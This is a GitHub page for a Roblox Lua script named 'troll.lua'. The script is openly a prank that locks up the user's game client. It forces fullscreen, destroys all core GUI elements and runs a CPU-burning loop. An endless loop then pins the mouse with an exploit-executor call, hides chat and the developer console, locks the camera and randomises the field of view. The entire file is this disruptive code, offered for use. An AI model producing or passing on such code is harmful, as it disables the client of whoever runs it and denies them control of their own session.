forked from zzerexx/scripts
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtroll.lua
More file actions
27 lines (27 loc) · 910 Bytes
/
troll.lua
File metadata and controls
27 lines (27 loc) · 910 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-- trolled!
if not UserSettings().GameSettings:InFullScreen() then
game:GetService("GuiService"):ToggleFullscreen()
end
for i,v in next, game.CoreGui:GetChildren() do
v:Destroy()
end
local t = Instance.new("TextBox",game.CoreGui)
game:GetService("RunService").Heartbeat:Connect(function()
for i = 1,999999 do
math.sqrt(i)
end
end)
while wait() do
if not UserSettings().GameSettings:InFullScreen() then
game:GetService("GuiService"):ToggleFullscreen()
end
mousemoveabs(100,100)
UserSettings().GameSettings.GraphicsQualityLevel = 10
UserSettings().GameSettings.ChatVisible = false
game:GetService("StarterGui"):SetCore("DevConsoleVisible",false)
game:GetService("Players").LocalPlayer.CameraMaxZoomDistance = 0
game:GetService("Players").LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
workspace.CurrentCamera.FieldOfView = math.random(25,50)
t:CaptureFocus()
warn("get trolled")
end